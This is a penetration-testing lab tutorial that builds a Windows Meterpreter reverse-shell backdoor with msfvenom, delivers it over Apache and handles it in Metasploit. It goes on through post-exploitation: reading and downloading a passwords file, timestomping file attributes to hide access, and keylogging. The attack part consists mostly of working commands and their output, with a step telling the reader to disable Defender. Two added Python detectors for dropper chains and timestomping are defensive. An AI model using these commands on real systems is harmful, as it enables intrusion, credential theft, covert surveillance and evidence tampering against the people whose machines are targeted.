Network-Servers-Penetration-Guides-and-Tools

Hacking Windows using Metasploit / Meterpreter - Post-Exploitation

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Backdoors

Backdoors are malicious files that carry a Trojan or other infectious application and can either halt the target machine or give an attacker partial or complete control over it. Attackers build such backdoors in an attempt to gain remote access to victim machines. They deliver them through email, file-sharing web applications, shared network drives and similar channels, and entice users to execute them. Once a user runs such an application, the attacker gains access to the affected machine and can perform activities such as keylogging, sensitive data extraction, and so on.

Objectives

Requisites


Before beginning this lab, create a file called passwords.txt on Windows 10 and write down some fake accounts like:

Save the file on your Desktop or Downloads folder.

Note: Make sure to disable Windows SmartScreen and Windows Defender.

Prepare the Backdoor

1. Create the Backdoor.exe

Switch to Kali Linux and open a Terminal window.

Type the command to create the payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > /root/Desktop/Backdoor.exe

Make sure to put your Kali IP in LHOST. If it works, you will see output like the following:

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

2. Share the Backdoor.exe

Start the Apache services:
service apache2 start

If apache2 is not installed, install it with: apt-get install apache2

Copy the Backdoor.exe to the /var/www/html/share/ folder, which will be visible from the web:
cp /root/Desktop/Backdoor.exe /var/www/html/share/

3. Set up the Handler

Open a new Terminal window and start the Metasploit Framework:
msfconsole

To handle exploits launched outside the framework, select the exploit/multi/handler:
use exploit/multi/handler

Set the reverse TCP payload:
set payload windows/meterpreter/reverse_tcp

To view the payload options:
options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Set the LHOST to your Kali IP:
set LHOST 10.0.2.42

LPORT can stay at its default of 4444, as shown above.

To start the handler in the background, type:
exploit -j -z

Download and Execute the Backdoor.exe

Switch to your Windows 10 virtual machine and launch the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then download Backdoor.exe.

Double-click on the application and accept the Warnings.

Now switch back to Kali.

If everything works, you will find that a Meterpreter session has opened in the Metasploit terminal.
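As an added detection-side example (not part of the original lab), the following Python correlates constructed Sysmon-style events to flag the chain this section produces: an executable written to the Downloads folder by a browser, launched, and making an outbound connection shortly afterwards. The event format, paths and process ids are assumptions built for the sample.

```python
import re
from datetime import datetime

# Constructed Sysmon-style events (hypothetical sample, not captured in the lab).
# Simplified key=value layout; EventID 11 = FileCreate, 1 = ProcessCreate,
# 3 = NetworkConnect. One benign download and one benign process are mixed in.
SAMPLE_EVENTS = r"""
2018-12-20T17:31:02 EventID=11 Image=C:\Program Files\Mozilla Firefox\firefox.exe TargetFilename=C:\Users\dummy\Downloads\Backdoor.exe
2018-12-20T17:31:20 EventID=1 Image=C:\Users\dummy\Downloads\Backdoor.exe ProcessId=4812 ParentImage=C:\Windows\explorer.exe
2018-12-20T17:31:21 EventID=3 Image=C:\Users\dummy\Downloads\Backdoor.exe ProcessId=4812 DestinationIp=10.0.2.42 DestinationPort=4444
2018-12-20T17:35:00 EventID=11 Image=C:\Program Files\Mozilla Firefox\firefox.exe TargetFilename=C:\Users\dummy\Downloads\report.pdf
2018-12-20T17:40:10 EventID=1 Image=C:\Windows\System32\notepad.exe ProcessId=5200 ParentImage=C:\Windows\explorer.exe
"""


def parse_event(line):
    """Split 'timestamp key=value key=value ...' into a dict; values may contain spaces."""
    ts, rest = line.split(" ", 1)
    ev = dict(re.findall(r"(\w+)=(.+?)(?=\s+\w+=|$)", rest))
    ev["ts"] = datetime.fromisoformat(ts)
    return ev


def find_dropper_chains(log_text, window_seconds=300):
    """Return (image, dest_ip, dest_port) for every executable that was dropped into
    a Downloads folder, started, and connected out within window_seconds of starting."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    downloaded = {}   # lower-cased path of .exe files created under \Downloads\
    started = {}      # ProcessId -> (image path, start time) for those executables
    hits = []
    for ev in events:
        eid = ev["EventID"]
        if eid == "11":
            target = ev["TargetFilename"].lower()
            if target.endswith(".exe") and "\\downloads\\" in target:
                downloaded[target] = ev["ts"]
        elif eid == "1" and ev["Image"].lower() in downloaded:
            started[ev["ProcessId"]] = (ev["Image"], ev["ts"])
        elif eid == "3" and ev["ProcessId"] in started:
            image, t0 = started[ev["ProcessId"]]
            if (ev["ts"] - t0).total_seconds() <= window_seconds:
                hits.append((image, ev["DestinationIp"], int(ev["DestinationPort"])))
    return hits


if __name__ == "__main__":
    for image, ip, port in find_dropper_chains(SAMPLE_EVENTS):
        print(f"downloaded executable {image} connected to {ip}:{port}")
```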

Using Meterpreter

To display the target system information, such as computer name, OS and so on, type:

sysinfo

meterpreter > sysinfo
Computer        : DESKTOP-ICB2IQ4
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

To view the IP address, MAC address and so on, type:

ipconfig

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  3
============
Name         : Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC : 08:00:27:f8:e8:ec
MTU          : 1500
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::b8c2:616d:b6a1:1f4e
IPv6 Netmask : ffff:ffff:ffff:ffff::

To get the user that the server is running as, type:

getuid

meterpreter > getuid
Server username: DESKTOP-ICB2IQ4\dummy

Go to the folder that contains the passwords.txt you created earlier, using the cd (change directory), ls (list) and pwd (print working directory) commands.

meterpreter > cd Desktop 
meterpreter > ls
Listing: C:\Users\dummy\Desktop
===============================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  6646896  fil   2018-12-19 16:48:13 -0500  ProxySwitcher.exe
100777/rwxrwxrwx  73802    fil   2018-12-18 15:45:13 -0500  T3st.exe
100666/rw-rw-rw-  282      fil   2018-12-13 14:38:05 -0500  desktop.ini
100666/rw-rw-rw-  173      fil   2018-12-20 12:28:02 -0500  passwords.txt.txt

After you find the file, use the cat command to read the contents of the text file:

meterpreter > cat passwords.txt.txt 
amex: bobby12 / qwerty123
paypal: bobby_123 / password123
twitter: b0bby1337 / password123
reddit: b0bby1337 / password123
google: bobby_31337@gmail.com / password1337

The MACE Attributes (Modified, Accessed, Created, Entry Modified)

While performing post-exploitation activities, a hacker accesses files to read their contents. Doing so changes the MACE attributes immediately, which gives the file owner an indication that someone has read or modified the information.

To leave no trace in these MACE attributes, use the timestomp command to change the attributes as you wish after accessing a file.

To view the MACE attributes of passwords.txt.txt, type:

timestomp passwords.txt.txt -v

This command displays the created time, accessed time, modified time, and entry modified time, as shown below:

meterpreter > timestomp passwords.txt.txt -v
[*] Showing MACE attributes for passwords.txt.txt
Modified      : 2018-12-20 12:29:25 -0500
Accessed      : 2018-12-20 12:28:02 -0500
Created       : 2018-12-20 12:28:02 -0500
Entry Modified: 2018-12-20 12:29:25 -0500
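Meterpreter's timestomp rewrites the $STANDARD_INFORMATION timestamps, so a defender compares them with the $FILE_NAME timestamps that the same MFT record keeps, and looks for the all-zero sub-second digits that a whole-second timestomp input leaves behind. The following added example (not from the original page) applies both checks to constructed MFT-style records; the file names and times are assumptions modelled on the listing above.

```python
from datetime import datetime

# Record layout (constructed): (name, si_times, fn_times), where each list holds
# the Modified, Accessed, Created and Entry-Modified timestamps of the
# $STANDARD_INFORMATION (si) and $FILE_NAME (fn) attributes, 100 ns precision.
STOMPED = "2018-12-18T15:45:13.000000-05:00"
SAMPLE_RECORDS = [
    # stomped: SI pushed back two days with zero sub-second digits, FN untouched
    ("passwords.txt.txt",
     [STOMPED] * 4,
     ["2018-12-20T12:29:25.431257-05:00", "2018-12-20T12:28:02.118904-05:00",
      "2018-12-20T12:28:02.118904-05:00", "2018-12-20T12:29:25.431257-05:00"]),
    # benign: real sub-second digits, SI never earlier than the FN creation time
    ("desktop.ini",
     ["2018-12-13T14:38:05.227811-05:00", "2018-12-20T12:28:00.554120-05:00",
      "2018-12-13T14:38:05.227811-05:00", "2018-12-13T14:38:05.227811-05:00"],
     ["2018-12-13T14:38:05.227811-05:00"] * 4),
    # benign edge case: zero sub-seconds on BOTH attributes (e.g. a file copied
    # from a FAT volume), so the zeroed-SI heuristic alone must not fire
    ("ProxySwitcher.exe",
     ["2018-12-19T16:48:13.000000-05:00"] * 4,
     ["2018-12-19T16:48:13.000000-05:00"] * 4),
]
MODIFIED, ACCESSED, CREATED, ENTRY = range(4)


def timestomp_indicators(record):
    """Return the anti-forensics indicators raised by one MFT record."""
    _, si_raw, fn_raw = record
    si = [datetime.fromisoformat(s) for s in si_raw]
    fn = [datetime.fromisoformat(s) for s in fn_raw]
    found = []
    # Heuristic 1: timestomp takes whole-second input, so every SI timestamp ends
    # with zero sub-second digits while FN still carries the original residue.
    if all(t.microsecond == 0 for t in si) and any(t.microsecond for t in fn):
        found.append("si_subsecond_zeroed")
    # Heuristic 2: a file cannot have been modified, created or have its record
    # changed before the file-name entry itself was created.
    if any(si[i] < fn[CREATED] for i in (MODIFIED, CREATED, ENTRY)):
        found.append("si_predates_fn_created")
    return found


def scan(records):
    """Map file name -> indicators for every record that raised at least one."""
    result = {}
    for record in records:
        indicators = timestomp_indicators(record)
        if indicators:
            result[record[0]] = indicators
    return result
```

Heuristic 2 is the stronger signal: an attacker can pick a plausible time with non-zero sub-seconds, but cannot move $FILE_NAME timestamps with timestomp.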

Download a File

download <filename>

meterpreter > download passwords.txt.txt
[*] Downloading: passwords.txt.txt -> passwords.txt.txt
[*] Downloaded 173.00 B of 173.00 B (100.0%): passwords.txt.txt -> passwords.txt.txt
[*] download   : passwords.txt.txt -> passwords.txt.txt

The downloaded file is stored in the local working directory from which msfconsole was started (your home folder by default).

The search command helps you locate files on the target machine. It can search the whole system or a specific folder.

search -f pagefile.sys

meterpreter > search -f pagefile.sys
Found 1 result...
    c:\pagefile.sys (1476395008 bytes)

Log all the Keystrokes

To start capturing all keyboard input from the target system, type:

keyscan_start

meterpreter > keyscan_start
Starting the keystroke sniffer ...

Switch to Windows 10, create a text file and type something.

Switch back to Kali Linux and dump the captured keystrokes by typing:

keyscan_dump

meterpreter > keyscan_dump 
Dumping captured keystrokes...
<Shift><Shift><Shift><Shift>Fox.txt<CR>
<Shift>The quick brown fox jumps over the lazy hacker.<^S>

View the idle time

To see how long the user has been idle on the remote system, type:

idletime

meterpreter > idletime 
User has been idle for: 4 mins 31 secs

You may shut down the target machine after finishing post-exploitation by typing:

shutdown

meterpreter > shutdown
Shutting down...
meterpreter > 
[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

Useful links: